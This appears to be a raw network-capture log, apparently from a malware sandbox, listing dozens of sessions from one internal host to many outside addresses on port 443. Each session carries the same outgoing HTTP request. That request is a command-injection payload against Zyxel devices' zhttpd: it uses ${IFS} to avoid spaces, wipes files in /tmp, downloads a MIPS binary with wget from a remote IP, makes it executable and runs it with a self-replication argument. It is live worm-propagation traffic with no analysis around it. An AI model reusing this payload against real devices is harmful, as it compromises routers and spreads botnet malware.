                                                        Jan 28, 2024 10:13:04.632108927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7403192.168.2.1457134202.48.69.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632141113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7404192.168.2.1450112140.172.186.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632164955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7405192.168.2.1456398128.135.204.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632236958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7406192.168.2.1443468206.135.161.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632252932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7407192.168.2.1446528153.8.137.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632271051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7408192.168.2.146037434.65.237.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632324934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7409192.168.2.1445468110.57.99.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632345915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7410192.168.2.1456110156.130.196.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632373095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7411192.168.2.1448828118.19.92.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632416964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7412192.168.2.144124069.134.1.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632452965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7413192.168.2.1440734161.75.122.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632488012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7414192.168.2.1434644212.62.239.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632522106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7415192.168.2.1451640182.108.232.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632550955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7416192.168.2.1434874172.166.89.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632581949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7417192.168.2.143881662.19.57.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632603884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7418192.168.2.143353269.72.101.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632654905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7419192.168.2.1436462146.75.35.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632690907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7420192.168.2.1459752139.51.130.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632731915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7421192.168.2.145381052.1.236.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632765055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7422192.168.2.1450298161.62.106.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632814884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7423192.168.2.1433810109.38.142.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632834911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7424192.168.2.1433784163.128.196.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632875919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7425192.168.2.1450006200.151.184.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632909060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7426192.168.2.145795265.50.92.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632956982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7427192.168.2.144269859.155.181.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.632980108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7428192.168.2.1434650141.3.72.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633039951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7429192.168.2.1442040192.171.26.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633071899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7430192.168.2.1449514162.49.144.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633131027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7431192.168.2.144749881.80.3.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633163929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7432192.168.2.1434132104.62.105.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633192062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7433192.168.2.145489272.166.47.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633246899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7434192.168.2.1443830139.216.73.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633270979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7435192.168.2.1459908199.244.212.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633335114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7436192.168.2.1439362128.151.193.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633379936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7437192.168.2.145182034.14.174.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633409023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7438192.168.2.144534293.142.248.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633436918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7439192.168.2.144914274.134.36.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633563995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7440192.168.2.145438861.219.166.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633590937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7441192.168.2.1457582223.138.86.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633639097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7442192.168.2.1447216139.151.206.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633678913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7443192.168.2.145850887.235.194.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633703947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7444192.168.2.1434614160.217.219.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633734941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7445192.168.2.144680287.194.0.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633785963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7446192.168.2.1432928183.63.121.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633824110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7447192.168.2.146058063.172.171.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633878946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7448192.168.2.1459264199.50.127.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633938074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7449192.168.2.1449906130.144.5.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633949041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7450192.168.2.146030849.80.239.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.633985043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7451192.168.2.1452382108.27.174.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634026051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7452192.168.2.1435348160.166.106.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634056091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7453192.168.2.1447696207.189.216.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634104967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7454192.168.2.1459404112.232.229.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634139061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7455192.168.2.1436962159.88.128.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634166002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7456192.168.2.1446818181.194.15.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634213924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7457192.168.2.1438194165.201.211.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634237051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7458192.168.2.1435962153.186.88.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634293079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7459192.168.2.1447438157.153.190.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634330034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7460192.168.2.143599243.113.112.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634361982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7461192.168.2.1439976209.209.107.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634392977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7462192.168.2.144266259.3.88.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.634426117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7463192.168.2.1436362175.177.73.63443
                                                        TimestampBytes transferredDirectionData
